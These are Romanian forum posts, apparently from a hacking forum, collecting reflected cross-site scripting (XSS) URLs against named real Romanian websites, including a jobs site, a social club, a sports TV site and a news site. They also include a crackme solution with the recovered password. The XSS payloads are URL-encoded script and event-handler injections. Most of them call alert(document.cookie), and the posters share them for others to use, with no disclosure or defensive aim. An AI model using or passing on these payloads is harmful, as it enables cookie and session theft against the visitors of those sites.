[www.bestjobs.ro]

pana ieri mergea si asta, dar s-au prins

http://www.bestjobs.ro/?bj_nl_p=search_job_result&idcountry=1&search_type=2&c_keywords=%252F%252F%252D%252D%253E%253C%252F%2553%2543%2552%2549%2550%2554%253E%2522%253E%2527%253E%253C%2553%2543%2552%2549%2550%2554%253E%2561%256C%2565%2572%2574%2528%2553%2574%2572%2569%256E%2567%252E%2566%2572%256F%256D%2543%2568%2561%2572%2543%256F%2564%2565%2528%2538%2538%252C%2538%2533%252C%2538%2533%252C%2533%2532%252C%2536%2536%252C%2531%2532%2531%252C%2533%2532%252C%2538%2539%252C%2538%2535%252C%2537%2536%2529%2529%253C%252F%2553%2543%2552%2549%2550%2554%253E&oras_sel=0&domeniu_sel=0&experienta_sel=0&search=

astazi am gasit asta:

la onfocus pe textbox-ul de cautare:

http://www.bestjobs.ro/?bj_nl_p=search_job_result&idcountry=1&search_type=2&c_keywords=%2F%2F%22+onfocus%3D%22alert%28String.fromCharCode%2888%2C83%2C83%2C32%2C66%2C121%2C32%2C89%2C85%2C76%29%29&oras_sel=0&domeniu_sel=0&experienta_sel=0&search=

la onmouseover pe textbox-ul de cautare:

http://www.bestjobs.ro/?bj_nl_p=search_job_result&idcountry=1&search_type=2&c_keywords=%2F%2F%22+onmouseover%3D%22alert%28String.fromCharCode%2888%2C83%2C83%2C32%2C66%2C121%2C32%2C89%2C85%2C76%29%29&oras_sel=0&domeniu_sel=0&experienta_sel=0&search=

merge si cu document.cookie

[club.neogen.ro]

testat pe firefox 2 si ie 7

e pus pe onfocus la search, deci tre sa dati click pe textbox sau sa ajungeti la textbox cu tab

http://club.neogen.ro/search_prieteni/?1=1&view=search&search_by=&searchtext=%27%6F%6E%66%6F%63%75%73%3D%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%3E&simple=

sau onmouseover pe textbox-ul de search sau pe linkurile de next/back din josul paginii:

http://club.neogen.ro/search_prieteni/?1=1&view=search&search_by=&searchtext=%27%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%3E&simple=

Poate fi exploatat mai bine.

foloseste cineva XSS-urile astea? sa stiu daca mai pun.

[www.gsptv.ro]

la asta e misto ca raman ultimele cautari pe fiecare sessionid

http://www.gsptv.ro/videoList1.php?tag=%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E

[Scoate poza (Crack me)]

a fost destul de simplu.

in prima instanta am incercat sa deschid form-ul 2 indiferent daca parola era buna sau nu, dar evident nu se decripta corect poza.

apoi am gasit functia care decripta string-ul din resurse si asa am aflat parola.

[www.realitatea.net]

http://www.realitatea.net/cautare/%253C%2553%2543%2552%2549%2550%2554%253E%2561%256C%2565%2572%2574%2528%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565%2529%253C%252F%2553%2543%2552%2549%2550%2554%253E

[Scoate poza (Crack me)]

Numarul de caractere l-am pus la nimereala. Nu am scris parola ca ma gandeam ca se mai chinue cineva si nu vroiam sa-i stric surpriza

Parola este: a6!SOUND!128!FreshMeat (are 22 de caractere).

Am folosit IDA Pro v5.2 si P32Dasm 2.3.

[Scoate poza (Crack me)]

Iata poza:

si parola este:*************